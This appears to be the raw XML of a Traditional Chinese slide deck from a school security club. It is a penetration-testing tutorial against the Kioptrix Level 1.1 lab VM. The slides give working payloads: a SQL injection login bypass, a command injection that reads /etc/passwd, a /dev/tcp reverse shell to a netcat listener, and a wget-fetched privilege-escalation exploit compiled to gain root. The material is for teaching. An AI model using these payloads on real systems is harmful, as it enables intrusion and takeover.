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7/ftin2JQpWcJ+iOP+XFJ09V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3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3" name="Google Shape;43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4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4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DBD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3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products/workstation-player/workstation-player-evaluation.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kali.org/get-kali/#kali-virtual-machin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ploit-db.com/exploits/947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lnhub.com/entry/kioptrix-level-11-2,23/#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zh-TW" sz="4800" b="1"/>
              <a:t>滲透測試 (1)</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="1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資安社 副社 王佑任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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1766442" y="2207041"/>
            <a:ext cx="8659116" cy="1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zh-TW" sz="2800"/>
              <a:t>開始建環境吧!</a:t>
            </a:r>
            <a:endParaRPr sz="2800"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 kali 虛擬機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345042" y="2086762"/>
            <a:ext cx="11846957" cy="371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建立一個資料夾，命名為vulhub ，將kali檔案、模擬機檔案皆放入並解壓縮。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開啟 Vmware，點選Open a Virtual Machine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點選資料夾內唯一可以選取的檔案</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="384048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1" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_4ec2215ee3351c591ce7b9b35d187cef.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710398475&amp;Signature=6iCipG0TYufhYrWynrzy0VqEMc4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033" y="3010774"/>
            <a:ext cx="38481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 descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_02959ee9bb906c2e1eb35eda88be01ad.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710398527&amp;Signature=N3IYScOsVyGDwvHlr8IP218MY%2B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3033" y="4489246"/>
            <a:ext cx="8979017" cy="369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 KIOPTRIX 靶機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345042" y="1935760"/>
            <a:ext cx="11846957" cy="371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開啟 Vmware，點選Open a Virtual Machine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點選資料夾內唯一可以選取的檔案</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="384048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2" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_4ec2215ee3351c591ce7b9b35d187cef.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710398475&amp;Signature=6iCipG0TYufhYrWynrzy0VqEMc4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593" y="2398378"/>
            <a:ext cx="38481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 descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_bd99f01e2c05ab301e8da781495ae20a.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710398629&amp;Signature=ce6V2VrL4NLoUotYNECbIBfgoo0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5593" y="4072593"/>
            <a:ext cx="59531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 KIOPTRIX 靶機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345042" y="1327939"/>
            <a:ext cx="4797410" cy="4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建立後KIOPTRIX點擊編輯虛擬機設定</a:t>
            </a:r>
            <a:endParaRPr sz="1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3" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_00230a321f556b3e7aa170fb93e1c93f.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710398699&amp;Signature=r6jHnrKwzxMzDZKItG2TgoHyEJA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56" y="2013356"/>
            <a:ext cx="4703015" cy="39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1232" y="2213094"/>
            <a:ext cx="3458058" cy="208626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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9143769" y="3721933"/>
            <a:ext cx="671118" cy="215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7049550" y="1468072"/>
            <a:ext cx="4809222" cy="10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點選add，選擇network adapter，點擊finish</a:t>
            </a:r>
            <a:endParaRPr sz="1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建立 KIOPTRIX 靶機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345043" y="1358844"/>
            <a:ext cx="5364213" cy="36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確定新增的network adapter2的network connection為NAT</a:t>
            </a:r>
            <a:endParaRPr sz="1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4" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_10cb93258875986c557e63cf20385a56.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710398889&amp;Signature=cZlwQDfWGg7L7szGgCHqA5qdWvo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679" y="2128029"/>
            <a:ext cx="5643803" cy="284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 descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_d022239533448c9a4b7899c9bff225f3.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710398922&amp;Signature=%2Bj%2FmahgW586v%2BXodqCww%2B%2B2lO%2BY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8147" y="1858025"/>
            <a:ext cx="4043493" cy="391218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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8197769" y="1287200"/>
            <a:ext cx="2935950" cy="50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將舊的network adapter刪除</a:t>
            </a:r>
            <a:endParaRPr sz="1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啟動kali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345043" y="1324126"/>
            <a:ext cx="7305718" cy="219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kali的憑證為 kali/kali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開啟firefox，打開youtube，確定是否有網路</a:t>
            </a:r>
            <a:endParaRPr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</a:pPr>
            <a:endParaRPr sz="1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檢查DHCP是否成功分配IP</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Google Shape;257;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1483697" y="3429000"/>
            <a:ext cx="2514205" cy="38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開啟terminal</a:t>
            </a:r>
            <a:endParaRPr/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905" y="3874595"/>
            <a:ext cx="5109825" cy="219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1543344" y="3874595"/>
            <a:ext cx="235122" cy="20245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7650761" y="3321691"/>
            <a:ext cx="2514205" cy="38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ip a</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261" name="Google Shape;261;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7875886" y="5529394"/>
            <a:ext cx="4144009" cy="78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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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zh-TW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altLang="zh-TW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zh-TW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為網卡名稱</a:t>
            </a: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</a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1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192.168.x.x為kali的動態IP</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="91440" marR="0" lvl="0" indent="-2539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5" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_146f2b705caf7afd572188eca4aac79b.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710399300&amp;Signature=%2BCLftYpVB9yewy0FMnTiiule9dA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813314"/>
            <a:ext cx="5923895" cy="16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啟動靶機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333222" y="1312464"/>
            <a:ext cx="4319236" cy="37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點選 I copied it</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="270" name="Google Shape;270;p16" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_df24c8a318c2361bd438136342b7be31.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710399443&amp;Signature=xt5vvYBvok49LK4wn4g7BZqySJ8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222" y="2304229"/>
            <a:ext cx="4654756" cy="24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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5694071" y="1322804"/>
            <a:ext cx="5241411" cy="47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按隨意鍵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6" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_1bc1d8fb6d50d6452057c2b192161994.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710399488&amp;Signature=yYf5%2FZSAPMDuMKbwOtNQ4M%2B0c2A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4071" y="2000774"/>
            <a:ext cx="5709843" cy="305263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啟動靶機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333222" y="1312464"/>
            <a:ext cx="4319236" cy="37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選取 keep Configuration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6096000" y="1312464"/>
            <a:ext cx="5241411" cy="47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選取Do Nothing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="281" name="Google Shape;281;p17" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_0c976fa734c9a1f931e500523315019f.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710399580&amp;Signature=ajYs%2BDzclusnuDqUa%2FY6hKN15oY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043" y="1929027"/>
            <a:ext cx="5403469" cy="34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7" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_47fe352294a07805c6afd4b633c71157.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710399593&amp;Signature=Y95GKmsHoupDsY1g%2Bp%2BSZLMSEV0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011221"/>
            <a:ext cx="5241411" cy="332417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啟動靶機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333222" y="1312464"/>
            <a:ext cx="4319236" cy="37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最終畫面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8" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_8fa1ae6acf27d020fb953c0c094a8b1f.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710399629&amp;Signature=BDiRydBEKhXJmqvqC1IZ%2B6a3gG0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946" y="1917100"/>
            <a:ext cx="6277825" cy="396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檢查kali是否成功可以偵測到模擬機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345043" y="1886189"/>
            <a:ext cx="4931632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檢查NAT的設定是否正確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73611" y="1246889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於KIOPTRIX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9" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_1056394bac224da55f6bdcf854c28afa.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710399769&amp;Signature=fvAs%2F2evpNBRer8QIQZZuHoCo6c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51" y="2684442"/>
            <a:ext cx="5316608" cy="334776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399551" y="2285316"/>
            <a:ext cx="37750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6916036" y="2285789"/>
            <a:ext cx="37750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9" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_36cffbb0b74c28747fa091e4f3b2f61d.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710399805&amp;Signature=aTNu9r49qEzZ%2Bk4hgpNePbo09ww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036" y="2754507"/>
            <a:ext cx="5252840" cy="215110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下載 Vmware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45043" y="956344"/>
            <a:ext cx="11617658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https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html.html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 descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_3716fa3bde652256b8eb58e6c8cb6c19.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710394202&amp;Signature=qeFMeo8FwD6GuK92hxs8jyz%2BhXo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341" y="1719917"/>
            <a:ext cx="10849761" cy="403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檢查kali是否成功可以偵測到模擬機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7787232" y="1886188"/>
            <a:ext cx="4931632" cy="114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nmap掃描同網域內的主機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nmap -F 192.168.x.0/24</a:t>
            </a:r>
            <a:endParaRPr/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x與自身ipv4的第三碼相同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673611" y="1246889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於kali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 descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_5842a1c93cbc0dbcc9a940d3dd375834.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710399969&amp;Signature=3PVCo64%2FrVlyZpCcuxKZHwL40U0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952" y="916800"/>
            <a:ext cx="5604283" cy="42255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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7787232" y="4000157"/>
            <a:ext cx="4404768" cy="161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猜測此192.168.239.131主機為虛擬機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目標開啟了 22,80,111,443,631,3306 port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其中80 port為網頁服務，打開firefox，輸入192.168.239.131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9286613" y="3243201"/>
            <a:ext cx="293615" cy="5421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瀏覽網頁服務</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="320" name="Google Shape;320;p21" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_a97320c7529863485bba4b8c6b18caca.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710400104&amp;Signature=SyvGHw%2Bsh8reSzs5IuaFl1XVU0c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25" y="970415"/>
            <a:ext cx="10386969" cy="30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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="969475" y="4276631"/>
            <a:ext cx="10386968" cy="151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發現是一個登入頁面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直覺利用 SQL injection攻擊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User: ' or 1 = 1 – //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Password: 123456 </a:t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>
            <a:off x="2933809" y="5213344"/>
            <a:ext cx="1319409" cy="28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zh-TW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((密碼隨便填</a:t>
            </a:r>
            <a:endParaRPr sz="1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發現一個 command，但沒有輸入列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482914" y="1793491"/>
            <a:ext cx="9080536" cy="9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開啟burp suite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Proxy -&gt; intercept</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="330" name="Google Shape;330;p22" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_5499527096b944b4c6afa94ad2642185.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710400481&amp;Signature=NVvA1%2BIXs2%2BG7zFZIfoQpjE38bY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8550" y="991379"/>
            <a:ext cx="52197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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="482914" y="3198291"/>
            <a:ext cx="9080536" cy="9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設定firefox以對接burp</a:t>
            </a:r>
            <a:endParaRPr/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open application menu -&gt; settings</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="332" name="Google Shape;332;p22" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_b532f121b90d347f84a3307a62bfebc1.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710400557&amp;Signature=6UXhqroiUErrWasF4Ld%2BetbXS7s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482" y="2907088"/>
            <a:ext cx="1655423" cy="33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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4429157" y="5401392"/>
            <a:ext cx="1585748" cy="20245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5814739" y="2905503"/>
            <a:ext cx="200166" cy="2150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設定firefox以對接burp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82914" y="1793491"/>
            <a:ext cx="9080536" cy="93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general -&gt; Settings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3" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_c34b65aec42f35a3d5702398d114632f.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710400734&amp;Signature=WwIHIjCp5aJ0VEc0NL6NMWIav3c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1763" y="612930"/>
            <a:ext cx="5125085" cy="5364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9010943" y="5648702"/>
            <a:ext cx="376337" cy="25714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設定firefox以對接burp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482914" y="1969660"/>
            <a:ext cx="4248477" cy="3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burp頁面即有顯示攔截請求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345043" y="1324773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重新整理http://192.168.239.131/index.php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4" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_93b6c40a9773ed044b8833195930c930.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710400858&amp;Signature=QokT8nJ3SJQHGmjh8wi5VAy5QwI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914" y="2447144"/>
            <a:ext cx="5841010" cy="348150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6499218" y="1969660"/>
            <a:ext cx="4834309" cy="3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點擊 action -&gt; do intercept -&gt; response to this request</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="354" name="Google Shape;354;p24" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_08b8497dfe28f2eec36c6716b932b614.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710400898&amp;Signature=2qqB9bACCu6A%2BDn2HyOcNzv8XRU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3127" y="2447144"/>
            <a:ext cx="4072239" cy="378097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設定firefox以對接burp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482914" y="1345901"/>
            <a:ext cx="4248477" cy="3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點擊forward，修改response</a:t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7078058" y="4241656"/>
            <a:ext cx="4834309" cy="3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點擊forward，並將intercept關閉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5" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_0fd700f0748072d13e45836759bd2f1f.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710400941&amp;Signature=I4CGTXt6VqrnZONl5fC8xwvBgks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848" y="1710295"/>
            <a:ext cx="6083332" cy="4517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 descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_b1c38230f120a2e34b5497ff0dc38763.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710400976&amp;Signature=5syu5GANXFTMCfsbTWq5waMNsjI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8700" y="3141653"/>
            <a:ext cx="2542337" cy="3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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7078058" y="2407075"/>
            <a:ext cx="4834309" cy="3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發現align=‘center&gt;少了一個 ’ 符號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把它補上!</a:t>
            </a:r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即可取得提供 ping 功能的命令列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45043" y="2962534"/>
            <a:ext cx="8840902" cy="250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透過 ; 可以提前結束ping指令，並再後方加入command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 ;ls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 ;cat /etc/passwd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 ;whoami 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6" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_61fcdb5a17fc77bbb91ab16e7fc43045.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710401071&amp;Signature=y8ubFeroD2Gmje7Cy2pCMAxLEzE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848" y="1295265"/>
            <a:ext cx="7746314" cy="107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取得反向shell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345043" y="1930688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1.在kali本地端啟動一個Netcat listener</a:t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715557" y="2309746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nc -nvlp 8888</a:t>
            </a:r>
            <a:endParaRPr/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55" y="2956914"/>
            <a:ext cx="3573526" cy="105178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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1930688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2.在command 注入 反向shell code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6466514" y="2399406"/>
            <a:ext cx="4867013" cy="8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;sh -i &gt;&amp; /dev/tcp/192.168.x.x/8888 0&gt;&amp;1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lang="zh-TW"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參數為本地ip, 監聽port number</a:t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426" y="3282732"/>
            <a:ext cx="5772956" cy="78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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345043" y="4541062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3.成功取得反向shell</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="387" name="Google Shape;387;p27" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_c25aa6df2576b7b56aa2f1b71342dcf7.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710403586&amp;Signature=heKePLN0Cpi2Q8b7fT47%2BuSUALg%3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555" y="5009780"/>
            <a:ext cx="4754198" cy="116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透過反向shell取得訊息</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="Google Shape;394;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345043" y="1930688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whoami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715557" y="2309746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發現user為apache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345043" y="3157522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pwd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715557" y="3536580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發現目錄為/var/www/html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345043" y="4384356"/>
            <a:ext cx="4168234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lsb_release -a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715556" y="4763414"/>
            <a:ext cx="4905068" cy="84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快速查看 Linux 系統的發行版本訊息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OS: CentOS release 4.5 (Final)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06" name="Google Shape;406;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345042" y="1309902"/>
            <a:ext cx="4663185" cy="88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搜尋權限提升可用漏洞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searchsploit centOS 4 Privilege Escalation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29" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_a68e0efbed86e83a41100b60ffe0d1fb.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710405770&amp;Signature=aWR7K5yq2Xl9CjLyGeweFMT%2BnL0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68" y="2137402"/>
            <a:ext cx="88487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安裝kali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 descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_6c9305179110d399db6513adb9bc7aa9.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710394444&amp;Signature=05DgDu1MEWLg05RiUAnaZ7QkQsw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664" y="2484207"/>
            <a:ext cx="5245687" cy="297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405496" y="1108744"/>
            <a:ext cx="11617658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https://www.kali.org/get-kali/#kali-virtual-machines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 descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_e313f0fa22d66afcb0f73b1985869a65.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710394618&amp;Signature=79giQAOXVCleTNXVKSJFzfZcJUY%3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5973" y="2484207"/>
            <a:ext cx="5356846" cy="297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6560191" y="2919369"/>
            <a:ext cx="1182848" cy="118284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81663" y="1897787"/>
            <a:ext cx="5245687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--&gt; Virtual Machines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6364652" y="1897787"/>
            <a:ext cx="5245687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--&gt; VMware 64</a:t>
            </a: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306659" y="3273249"/>
            <a:ext cx="2272019" cy="188597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345042" y="1309902"/>
            <a:ext cx="4663185" cy="88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下載exploit script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searchsploit -m 9479</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="415" name="Google Shape;415;p30" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_fd066d30b33d0f19b2c297451f421d45.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710405819&amp;Signature=w6m3fIZHnnCLVtx30QD5kmhXaTc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60" y="2324100"/>
            <a:ext cx="66008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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191005" y="2744540"/>
            <a:ext cx="671118" cy="215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345042" y="4276180"/>
            <a:ext cx="7533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Exploit: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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https://www.exploit-db.com/exploits/9479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345042" y="1309902"/>
            <a:ext cx="8396286" cy="197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修改exploit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若直接利用exploit，後續會有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW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error: “No newline at end of file”</a:t>
            </a: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為求方便先進行更改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345042" y="2592810"/>
            <a:ext cx="6257094" cy="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在文件尾增加兩個空行符號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zh-TW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mousepad 9479.c</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="426" name="Google Shape;426;p31" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_6139bbe5bd5b4de260c72e9feba5acac.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710406118&amp;Signature=6s80Uo3rEoF8cc4lVq1KZdfn3CM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5759" y="2718033"/>
            <a:ext cx="6463790" cy="317999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33" name="Google Shape;433;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345042" y="1309902"/>
            <a:ext cx="8396286" cy="4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將exploit下載到目標主機上，並且使用gcc編譯，並且執行取得root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345042" y="1930992"/>
            <a:ext cx="2263934" cy="36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 kali 主機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842483" y="2447369"/>
            <a:ext cx="8396286" cy="78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在放有9479.c的目錄上啟動一個簡單的HTTP server，並監聽port 80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python3 -m http.server 80</a:t>
            </a:r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2044" y="3378701"/>
            <a:ext cx="8869013" cy="1648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32"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1610686" y="4605556"/>
            <a:ext cx="211402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8" name="Google Shape;438;p32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2759746" y="3776229"/>
            <a:ext cx="671118" cy="215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3" descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_898cdbb6f736d642212a52e45eeac222.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710406418&amp;Signature=S4dsRFugpb4sv6avLRcXedVqRko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1482" y="3378701"/>
            <a:ext cx="6736142" cy="25507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3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46" name="Google Shape;446;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345042" y="1309902"/>
            <a:ext cx="8396286" cy="4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將exploit下載到目標主機上，並且使用gcc編譯，並且執行取得root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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345042" y="1930992"/>
            <a:ext cx="2263934" cy="36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在反向shell中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842483" y="2447369"/>
            <a:ext cx="8396286" cy="78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透過wget下載檔案，存在/var/www/html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 http://192.168.239.130/9479.c</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="449" name="Google Shape;449;p33"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1781482" y="5929481"/>
            <a:ext cx="257240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33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9893419" y="5929481"/>
            <a:ext cx="1754421" cy="374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failed</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="Google Shape;451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345042" y="1309902"/>
            <a:ext cx="8396286" cy="4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將exploit下載到目標主機上，並且使用gcc編譯，並且執行取得root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345042" y="1930992"/>
            <a:ext cx="2263934" cy="36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在反向shell中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842483" y="2447368"/>
            <a:ext cx="8396286" cy="110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移動到/tmp上執行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/tmp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 http://192.168.239.130/9479.c</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="Google Shape;460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提升權限</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="Google Shape;466;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345042" y="1309902"/>
            <a:ext cx="8396286" cy="46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將exploit下載到目標主機上，並且使用gcc編譯，並且執行取得root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345042" y="1930992"/>
            <a:ext cx="2263934" cy="36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在反向shell中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842483" y="2447368"/>
            <a:ext cx="8396286" cy="3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Compile the exploit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-o Exploit 9479.c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編譯完成會有一個名為 “Expolit” 的可執行檔案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253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執行exploit</a:t>
            </a:r>
            <a:endParaRPr/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./Exploit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="91440" marR="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再whoami會發現已經是root user</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="469" name="Google Shape;469;p35" descr="https://miro.medium.com/v2/resize:fit:700/1*dAOue155v2e3KluQiNIgk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378" y="4264283"/>
            <a:ext cx="5114685" cy="1490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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1031846" y="1828799"/>
            <a:ext cx="10123834" cy="23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94D"/>
              </a:buClr>
              <a:buSzPts val="8000"/>
              <a:buFont typeface="Arial Rounded"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" b="1">
                <a:solidFill>
                  <a:srgbClr val="1F394D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Thanks for listening</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="1F394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76" name="Google Shape;476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903" y="293615"/>
            <a:ext cx="4377849" cy="567515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345043" y="378571"/>
            <a:ext cx="1085426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下載模擬機檔案  (KIOPTRIX: LEVEL 1.1 (#2)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405496" y="1108744"/>
            <a:ext cx="11617658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https://www.vulnhub.com/entry/kioptrix-level-11-2,23/#top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 descr="https://hackmd-prod-images.s3-ap-northeast-1.amazonaws.com/uploads/upload_ccd6febdc9cb0f17c26cba52b6b7555d.png?AWSAccessKeyId=AKIA3XSAAW6AWSKNINWO&amp;Expires=1710394889&amp;Signature=U%2B06utRm3fTD3d1ymgrNyNLYOQo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909" y="2249978"/>
            <a:ext cx="10137980" cy="302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一些簡單的資安知識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066800" y="1277592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CIA Triad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3598877" y="1988191"/>
            <a:ext cx="0" cy="20804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5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7777993" y="3650608"/>
            <a:ext cx="0" cy="20804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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
